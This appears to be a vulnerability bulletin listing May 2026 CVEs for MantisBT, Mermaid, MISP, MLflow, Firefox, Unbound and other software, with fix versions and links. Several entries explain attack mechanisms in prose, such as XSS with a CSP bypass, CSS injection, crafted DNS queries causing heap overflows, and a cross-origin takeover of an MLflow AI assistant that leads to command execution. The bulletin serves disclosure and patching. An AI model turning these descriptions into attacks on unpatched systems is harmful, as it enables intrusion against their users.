mantisbt–mantisbt Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.11.0 through 2.28.1 allow any authenticated user to inject arbitrary HTML by updating their account’s font family. Upon exploitation, an XSS payload would be reflected on every MantisBT page. Leveraging another vulnerability (CSP bypass, see GHSA-9c3j-xm6v-j7j3), the attacker could achieve account takeover. This issue has been fixed in version 2.28.2. 2026-05-22 not yet calculated CVE-2026-40596 https://github.com/mantisbt/mantisbt/security/advisories/GHSA-j3v9-553h-x28j
https://github.com/mantisbt/mantisbt/security/advisories/GHSA-9c3j-xm6v-j7j3
https://github.com/mantisbt/mantisbt/commit/9e8409cdd979eba86ef532756fc47c1d8112d22d
https://mantisbt.org/bugs/view.php?id=37011
https://mantisbt.org/bugs/view.php?id=37016
 
mantisbt–mantisbt Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions 2.28.1 and below, given any pre-existing XSS / HTML injection vulnerability, an attacker can bypass the Content Security Policy’s script-src directive by uploading a crafted attachment to any issue that, when accessed via the file_download.php link, will be downloaded with a valid JavaScript MIME type resulting in script execution. The uploaded payload must be sniffed as a valid JavaScript MIME type by PHP finfo (see file_create_finfo() API function). Non-JavaScript MIME types will not get imported in a <script> tag by the browser, due to response header X-Content-Type-Options being set to nosniff, which requires all imported JavaScript files to be a valid JavaScript MIME type. This issue has been fixed in version 2.28.2. 2026-05-22 not yet calculated CVE-2026-40597 https://github.com/mantisbt/mantisbt/security/advisories/GHSA-9c3j-xm6v-j7j3
https://github.com/mantisbt/mantisbt/commit/9e3bee2e7b909f4e3596985892b8bc8bee9e0bfe
https://mantisbt.org/bugs/view.php?id=37016
 
mantisbt–mantisbt Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions 2.28.1 and below, improper escaping of the redirection page (retrieved from the request’s Referer header) allows an attacker to inject HTML. While this is generally not directly actionable as modern browsers will URL-encode special characters, on some specific server configurations this could poison the cache, leading to cross-site scripting. This issue has been fixed in version 2.28.2. 2026-05-22 not yet calculated CVE-2026-40598 https://github.com/mantisbt/mantisbt/security/advisories/GHSA-6jh4-47v2-4g37
https://github.com/mantisbt/mantisbt/commit/b1ebc57763f104eb5f541b7b4d1ce6948168abd9
https://mantisbt.org/bugs/view.php?id=37017
 
mantisbt–mantisbt Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions 2.11.0 through 2.28.1, a Stored XSS vulnerability is caused by incorrect escaping of a saved filter’s owner, allowing an attacker to inject arbitrary HTML on systems where $g_show_user_realname = ON. Note that by default, only users with Manager access level or above can save their filters publicly. This issue has been fixed in version 2.28.2. If developers are unable to update immediately, they can work around this issue by preventing display of users’ real names (set $g_show_user_realname = OFF; in configuration), and restricting the ability to store filters (set $g_stored_query_create_threshold / $g_stored_query_create_shared_threshold to NOBODY). 2026-05-22 not yet calculated CVE-2026-40607 https://github.com/mantisbt/mantisbt/security/advisories/GHSA-f633-865q-2mhh
https://github.com/mantisbt/mantisbt/commit/44f490bcf20fd491c1b8f3fc9dd041d8c2a30010
https://mantisbt.org/bugs/view.php?id=37015
 
mermaid-js–mermaid Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Versions 10.9.5 and prior, in addition to 11.0.0-alpha.1 through 11.12.0 are vulnerable to CSS injection through improper sanitization. The state diagram (and any other diagram type that routes user-controlled style strings through the createCssStyles parser) captures classDef values using an unrestricted regex that matches everything up to a newline. That value then flows unsanitized through addStyleClass() into createCssStyles() and is assigned to style.innerHTML, so a closing brace (}) in the value terminates the generated CSS selector and turns everything after it into a new CSS rule on the page. This enables page defacement, user tracking via url() callbacks, and DOM attribute exfiltration. This issue has been fixed in versions 10.9.6 and 11.15.0. If developers are unable to immediately upgrade, they can work around this issue by setting “securityLevel”: “sandbox”, which prevents the issue by rendering the mermaid diagram in a sandboxed <iframe>. 2026-05-22 not yet calculated CVE-2026-41148 https://github.com/mermaid-js/mermaid/security/advisories/GHSA-xcj9-5m2h-648r
https://github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102
https://github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f
https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0
https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6
https://mermaid.js.org/config/schema-docs/config.html#securitylevel
 
mermaid-js–mermaid Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Versions 10.9.5 and earlier, as well as 11.0.0-alpha.1 through 11.14.0, are vulnerable to HTML injection under the default configuration. Specifically, the classDef directive in Mermaid state diagrams permits DOM injection that escapes the SVG context. However, <script> tags are stripped, which prevents cross-site scripting (XSS). This issue has been fixed in versions 10.9.6 and 11.15.0. If developers are unable to immediately upgrade, they can work around this issue by setting “securityLevel”: “sandbox”, which prevents the issue by rendering the mermaid diagram in a sandboxed <iframe>. 2026-05-22 not yet calculated CVE-2026-41149 https://github.com/mermaid-js/mermaid/security/advisories/GHSA-ghcm-xqfw-q4vr
https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056
https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3
 
misp–misp MISP’s OIDC authentication plugin allowed automatic linking of an OIDC identity to an existing local user account based on the email claim when the local account had no stored sub value. Under insecure or untrusted IdP configurations where email ownership is not enforced, an attacker with a valid OIDC token could assert a victim’s email address and authenticate as that user, leading to account takeover. 2026-05-20 not yet calculated CVE-2026-9084 https://github.com/MISP/MISP/commit/71f5662c1b5886613d2cd5c72fd93bb4ca6fa172
 
misp–misp A vulnerability was identified in the ShadowAttribute proposal creation workflow. The add action accepted user-controlled ShadowAttribute request data without removing the id field before saving the record. Because the underlying framework treats a supplied primary key as an instruction to update an existing record, an authenticated user able to submit shadow attribute proposals could provide the identifier of an existing ShadowAttribute and cause that record to be updated instead of creating a new proposal. This can result in unauthorized modification of existing shadow attributes, potentially affecting proposals associated with events the user should not be able to alter. Depending on deployment configuration and accessible API responses, the issue may also expose or move proposal data across event contexts. The vulnerability is caused by trusting a client-supplied primary key during object creation. The fix removes the id field from incoming ShadowAttribute data before processing, ensuring that the endpoint always creates a new proposal rather than updating an existing one. This has been fixed in MISP 2.5.38. 2026-05-20 not yet calculated CVE-2026-9136 https://github.com/MISP/MISP/commit/49911b1d4b6e4517d803e50e3d980aaa4d37c16d
 
misp–misp The CSP report endpoint intended to limit logged CSP reports to 1 KB but incorrectly allowed reports up to 1 MB before truncation. On deployments where the endpoint is reachable by untrusted clients, this could allow attackers to generate excessive log volume and contribute to resource exhaustion or log flooding. 2026-05-20 not yet calculated CVE-2026-9137 https://github.com/MISP/MISP/commit/02932cccab230b295afcaf5aa05e363d30db0ec9
 
mlflow–mlflow/mlflow In MLflow version 3.9.0, the MLflow Assistant feature introduced improper origin validation in its /ajax-api endpoints. This vulnerability allows a remote attacker to exploit cross-origin requests from a malicious webpage to interact with the MLflow Assistant running on a victim’s local machine. By bypassing the loopback-only restriction, the attacker can modify the Assistant’s configuration to enable full access, which in turn allows the execution of arbitrary commands via the Claude Code sub-agent. This issue is resolved in version 3.10.0. 2026-05-19 not yet calculated CVE-2026-2611 https://huntr.com/bounties/8462addd-b464-4a84-b6a2-5529604e6e5a
https://github.com/mlflow/mlflow/commit/8f9c8a53af90842944101eb8b7d60706822c81bc
 
mlflow–mlflow/mlflow In mlflow/mlflow versions up to 3.9.0, the `SearchModelVersions` REST API endpoint and the `mlflowSearchModelVersions` GraphQL query lack proper per-model authorization checks when basic authentication is enabled. This allows any authenticated user to enumerate all model versions across all registered models, regardless of their permission level. The issue arises due to the absence of `SearchModelVersions` in the `BEFORE_REQUEST_VALIDATORS` and `AFTER_REQUEST_HANDLERS` for the REST API, and its omission from `GraphQLAuthorizationMiddleware.PROTECTED_FIELDS` for GraphQL. This vulnerability can expose sensitive information such as model names, version descriptions, source URIs, tags, and other metadata, potentially revealing proprietary or confidential details in multi-tenant environments. The issue is resolved in version 3.10.0. 2026-05-21 not yet calculated CVE-2026-2734 https://huntr.com/bounties/d632f783-b2c7-4a3b-af5e-1d693e841c08
https://github.com/mlflow/mlflow/commit/6989066af33fdcb03588fd71a1a67f8fc5ef12c9
 
mlflow–mlflow/mlflow In mlflow/mlflow versions prior to 3.11.0, the `get_or_create_nfs_tmp_dir()` function in `mlflow/utils/file_utils.py` creates temporary directories with world-writable permissions (0o777), and the `_create_model_downloading_tmp_dir()` function in `mlflow/pyfunc/__init__.py` creates directories with group-writable permissions (0o770). These insecure permissions allow local attackers to tamper with model artifacts, such as cloudpickle-serialized Python objects, and achieve arbitrary code execution when the tampered artifacts are deserialized via `cloudpickle.load()`. This vulnerability is particularly critical in environments with shared NFS mounts, such as Databricks, where NFS is enabled by default. The issue is a continuation of the vulnerability class addressed in CVE-2025-10279, which was only partially fixed. 2026-05-18 not yet calculated CVE-2026-4137 https://huntr.com/bounties/648dc30b-76c7-4433-86b8-f43d926fd8d6
https://github.com/mlflow/mlflow/commit/1dcbb0c2fbd1f446c328830e601ca13a28219b8a
 
ModelScope–ModelScope 1.25.0 An issue was discovered in ModelScope 1.25.0 allowing attackers to execute arbitrary code via a crafted module listed in the configuration file (dey_mini.yaml) under the key [‘nnet’][‘module’]. 2026-05-19 not yet calculated CVE-2025-51427 https://github.com/modelscope/modelscope/issues/1331
https://github.com/modelscope/modelscope/pull/1333
https://github.com/JIRUWOZHI/vulnerability-disclosure/blob/main/CVE-2025-51427/CVE_2025_51427.md
 
Mozilla–Firefox Sandbox escape in Firefox and Firefox Focus for Android. This vulnerability was fixed in Firefox 151. 2026-05-19 not yet calculated CVE-2026-8945 https://bugzilla.mozilla.org/show_bug.cgi?id=2003171
https://www.mozilla.org/security/advisories/mfsa2026-46/
 
Mozilla–Firefox Incorrect boundary conditions in the Audio/Video: Web Codecs component. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8946 https://bugzilla.mozilla.org/show_bug.cgi?id=2029070
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-47/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox Use-after-free in the DOM: Bindings (WebIDL) component. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8947 https://bugzilla.mozilla.org/show_bug.cgi?id=2038439
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-47/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox Same-origin policy bypass in the DOM: Networking component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. 2026-05-19 not yet calculated CVE-2026-8948 https://bugzilla.mozilla.org/show_bug.cgi?id=2038803
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-50/
 
Mozilla–Firefox Integer overflow in the Widget: Win32 component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8949 https://bugzilla.mozilla.org/show_bug.cgi?id=1355639
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox Same-origin policy bypass in the Networking: HTTP component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8950 https://bugzilla.mozilla.org/show_bug.cgi?id=1965430
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox Spoofing issue in the Toolbar component in Firefox for Android. This vulnerability was fixed in Firefox 151. 2026-05-19 not yet calculated CVE-2026-8951 https://bugzilla.mozilla.org/show_bug.cgi?id=2018513
https://www.mozilla.org/security/advisories/mfsa2026-46/
 
Mozilla–Firefox Privilege escalation in the Application Update component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. 2026-05-19 not yet calculated CVE-2026-8952 https://bugzilla.mozilla.org/show_bug.cgi?id=2021727
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-50/
 
Mozilla–Firefox Sandbox escape due to use-after-free in the Disability Access APIs component. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8953 https://bugzilla.mozilla.org/show_bug.cgi?id=2029511
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-47/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox Incorrect boundary conditions, integer overflow in the Audio/Video component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8954 https://bugzilla.mozilla.org/show_bug.cgi?id=2030747
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox Privilege escalation in the DOM: Workers component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8955 https://bugzilla.mozilla.org/show_bug.cgi?id=2031064
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox Integer overflow in the Networking: JAR component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8956 https://bugzilla.mozilla.org/show_bug.cgi?id=2032427
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox Privilege escalation in the Enterprise Policies component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8957 https://bugzilla.mozilla.org/show_bug.cgi?id=2033850
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox Information disclosure, sandbox escape in the Security: Process Sandboxing component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8958 https://bugzilla.mozilla.org/show_bug.cgi?id=2034713
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox Sandbox escape due to incorrect boundary conditions in the Widget: Win32 component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8959 https://bugzilla.mozilla.org/show_bug.cgi?id=2034754
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox Spoofing issue in WebExtensions. This vulnerability was fixed in Firefox 151 and Thunderbird 151. 2026-05-19 not yet calculated CVE-2026-8960 https://bugzilla.mozilla.org/show_bug.cgi?id=1940116
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-50/
 
Mozilla–Firefox Spoofing issue in the Form Autofill component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8961 https://bugzilla.mozilla.org/show_bug.cgi?id=1962625
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox Mitigation bypass in the DOM: Security component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8962 https://bugzilla.mozilla.org/show_bug.cgi?id=2004804
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox Spoofing issue in the Web Speech component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. 2026-05-19 not yet calculated CVE-2026-8963 https://bugzilla.mozilla.org/show_bug.cgi?id=2021222
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-50/
 
Mozilla–Firefox Spoofing issue in the Popup Blocker component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. 2026-05-19 not yet calculated CVE-2026-8964 https://bugzilla.mozilla.org/show_bug.cgi?id=2025170
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-50/
 
Mozilla–Firefox Information disclosure in the DOM: Security component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. 2026-05-19 not yet calculated CVE-2026-8965 https://bugzilla.mozilla.org/show_bug.cgi?id=2025740
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-50/
 
Mozilla–Firefox Information disclosure in the IP Protection component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. 2026-05-19 not yet calculated CVE-2026-8966 https://bugzilla.mozilla.org/show_bug.cgi?id=2025849
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-50/
 
Mozilla–Firefox Information disclosure in the Graphics: WebGPU component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. 2026-05-19 not yet calculated CVE-2026-8967 https://bugzilla.mozilla.org/show_bug.cgi?id=2027173
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-50/
 
Mozilla–Firefox Denial-of-service due to invalid pointer in the Audio/Video: Web Codecs component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8968 https://bugzilla.mozilla.org/show_bug.cgi?id=2030467
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox Mitigation bypass in the DOM: Security component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. 2026-05-19 not yet calculated CVE-2026-8969 https://bugzilla.mozilla.org/show_bug.cgi?id=2031123
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-50/
 
Mozilla–Firefox Privilege escalation in the Security component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8970 https://bugzilla.mozilla.org/show_bug.cgi?id=2032174
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox Same-origin policy bypass in the Networking: JAR component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. 2026-05-19 not yet calculated CVE-2026-8971 https://bugzilla.mozilla.org/show_bug.cgi?id=2032604
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-50/
 
Mozilla–Firefox Privilege escalation in the WebRTC: Audio/Video component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. 2026-05-19 not yet calculated CVE-2026-8972 https://bugzilla.mozilla.org/show_bug.cgi?id=2033275
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-50/
 
Mozilla–Firefox Memory safety bugs present in Thunderbird 150. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 151 and Thunderbird 151. 2026-05-19 not yet calculated CVE-2026-8973 Memory safety bugs fixed in Thunderbird 151
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-50/
 
Mozilla–Firefox Memory safety bugs present in Thunderbird 140.10 and Thunderbird 150. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8974 Memory safety bugs fixed in Thunderbird 140.11 and Thunderbird 151
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox Memory safety bugs present in Thunderbird 140.10 and Thunderbird 150. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. 2026-05-19 not yet calculated CVE-2026-8975 Memory safety bugs fixed in Thunderbird 140.11 and Thunderbird 151
https://www.mozilla.org/security/advisories/mfsa2026-46/
https://www.mozilla.org/security/advisories/mfsa2026-47/
https://www.mozilla.org/security/advisories/mfsa2026-48/
https://www.mozilla.org/security/advisories/mfsa2026-50/
https://www.mozilla.org/security/advisories/mfsa2026-51/
 
Mozilla–Firefox for iOS Firefox for iOS hosted Reader mode on an unauthenticated local web server, allowing another application on the same device to request arbitrary URLs and receive the response rendered with the signed-in user’s cookies. This vulnerability was fixed in Firefox for iOS 151.0. 2026-05-19 not yet calculated CVE-2026-8706 https://bugzilla.mozilla.org/show_bug.cgi?id=2036618
https://www.mozilla.org/security/advisories/mfsa2026-49/
 
ngrok–ngrok v4.3.3 and 5.0.0-beta.2 ngrok v4.3.3 and 5.0.0-beta.2 are vulnerable to Command Injection. 2026-05-18 not yet calculated CVE-2025-57282 https://www.npmjs.com
https://gist.github.com/Dremig/90c2a0a2f85b0921f10e0bb3192a0c23
 
NLnet Labs–Unbound NLnet Labs Unbound 1.6.2 up to and including version 1.25.0 has a denial of service vulnerability when compiled with DNSCrypt support (‘--enable-dnscrypt’). A bad DNSCrypt query could underflow Unbound’s DNSCrypt packet reading procedure, which may lead to a heap overflow. A malicious actor can exploit the vulnerability with a single bad DNSCrypt query whose decrypted plaintext consists entirely of ‘0x00’ bytes and does not contain the expected ‘0x80’ marker. Unbound would then keep reading more bytes than necessary until it finds a non-‘0x00’ byte. Based on the underlying memory allocator and the memory layout, it could lead to a heap overflow while reading, followed by a crash. Likelihood of a crash is low, since it relies heavily on the underlying memory allocator and the memory layout. If the heap overflow does not happen, Unbound’s later packet checks will deny the packet. Unbound 1.25.1 contains a patch with a fix to bound reading in the given buffer space. 2026-05-20 not yet calculated CVE-2026-32792 https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-32792.txt
 
NLnet Labs–Unbound NLnet Labs Unbound 1.19.1 up to and including version 1.25.0 has a vulnerability in the DNSSEC validator that enables denial of service and possible remote code execution as a result of deep copying a data structure and erroneously overwriting a destination pointer. An adversary can exploit the vulnerability by controlling a malicious signed zone and querying a vulnerable Unbound. When DS sub-queries need to suspend validation due to NSEC3 computational budget exhaustion (introduced in Unbound 1.19.1), Unbound deep-copies response messages to preserve them across memory region teardown. A struct-assignment bug overwrites the destination’s pointer with the source’s pointer. After the sub-query region is freed, the resumed validator dereferences this dangling pointer, triggering a crash or potentially enabling arbitrary code execution. Unbound 1.25.1 contains a patch with a fix to preserve the correct pointer when deep copying the data structure. 2026-05-20 not yet calculated CVE-2026-33278 https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-33278.txt
 
NLnet Labs–Unbound NLnet Labs Unbound 1.16.2 up to and including version 1.25.0 has a vulnerability of the ‘ghost domain names’ family of attacks that could extend the ghost domain window by up to one cached TTL configured value. Similar to other ‘ghost domain names’ attacks, an adversary needs to control a (ghost) zone and be able to query a vulnerable Unbound. A single client NS query can cause Unbound to overwrite the cached expired parent-side referral NS rrset with the child-side apex NS rrset and essentially extend the ghost domain window by up to one cached TTL configured value (‘cache-max-ttl’). In configurations where ‘harden-referral-path: yes’ is used (non-default configuration), no client NS query is required since Unbound implicitly performs that query. Unbound 1.25.1 contains a patch with a fix that does not allow extension of TTLs for (parent) NS records regardless of their trust. 2026-05-20 not yet calculated CVE-2026-40622 https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-40622.txt
 
NLnet Labs–Unbound NLnet Labs Unbound up to and including version 1.25.0 is vulnerable to a degradation of service attack related to parsing long lists of incoming EDNS options. An adversary sending queries with too many EDNS options can hold Unbound threads hostage while they are parsing and creating internal data structures for the options. Coordinated attacks can result in degradation and/or denial of service. Unbound 1.25.1 contains a patch with a fix to limit acceptable incoming EDNS options (100). 2026-05-20 not yet calculated CVE-2026-41292 https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-41292.txt
 
NLnet Labs–Unbound NLnet Labs Unbound up to and including version 1.25.0 has a vulnerability in the jostle logic that could defeat its purpose and degrade resolution performance. Retransmits of the same query could renew the age of slow running queries and not allow the jostle logic to see them as aged and potential targets for replacement with new queries. An adversary who can query a vulnerable Unbound and who can control a domain name server that replies slowly and/or maliciously to Unbound’s queries can exploit the vulnerability and degrade the resolution performance of Unbound. When Unbound’s ‘num-queries-per-thread’ reaches its limit, the jostle logic kicks in. When a new query comes in, half of the available queries that are also slow to resolve are candidates for replacement. The vulnerability then happens because duplicate queries that need resolution would skew the aging result by using the timestamp of the latest duplicate query instead of the original one that started the resolution effort. Cache and local data response performance remains unaffected. Coordinated attacks could raise this to a denial of resolution service. Unbound 1.25.1 contains a patch with a fix to attach an initial, non-updatable start time for incoming queries that allow the jostle logic to work as intended. 2026-05-20 not yet calculated CVE-2026-42534 https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42534.txt
 
NLnet Labs–Unbound NLnet Labs Unbound up to and including version 1.25.0 has a vulnerability in the DNSSEC validator where the code path to consult the negative cache for DS records does not take into account the limit on NSEC3 hash calculations introduced in 1.19.1. This leads to degradation of service during the attack. An adversary that controls a DNSSEC signed zone can exploit this by signing NSEC3 records with acceptably high iterations for child delegations and querying a vulnerable Unbound. Unbound will keep performing the allowed hash calculations on the NSEC3 records and will not limit the work by the mitigation introduced in 1.19.1. As a side effect, a global lock for the negative cache will be held for the duration of the hashing, blocking other threads that need to consult the negative cache. Coordinated attacks could raise the vulnerability to denial of service. Unbound 1.25.1 contains a patch with a fix to bound the vulnerable code path with the existing limit for NSEC3 hash calculations. 2026-05-20 not yet calculated CVE-2026-42923 https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42923.txt
 
NLnet Labs–Unbound NLnet Labs Unbound 1.14.0 up to and including version 1.25.0 has a vulnerability that results in heap overflow when encoding multiple NSID and/or DNS Cookie EDNS and/or EDNS Padding options in the reply packet. The relevant options (‘nsid’, ‘answer-cookie’, ‘pad-responses’ (default)) need to be enabled for the vulnerability to be exploited. An adversary who can query Unbound can exploit the vulnerability by attaching multiple NSID and/or DNS Cookie EDNS and/or EDNS Padding options to the query. A flaw in the size calculation of the EDNS field truncates the correct value which allows the encoder to overflow the available space when writing. Those two combined lead to a heap overflow write of Unbound controlled data and eventually a crash. Unbound 1.25.1 contains a patch with a fix to de-duplicate the EDNS options and a fix to prevent truncation of the EDNS field size calculation. 2026-05-20 not yet calculated CVE-2026-42944 https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42944.txt
 
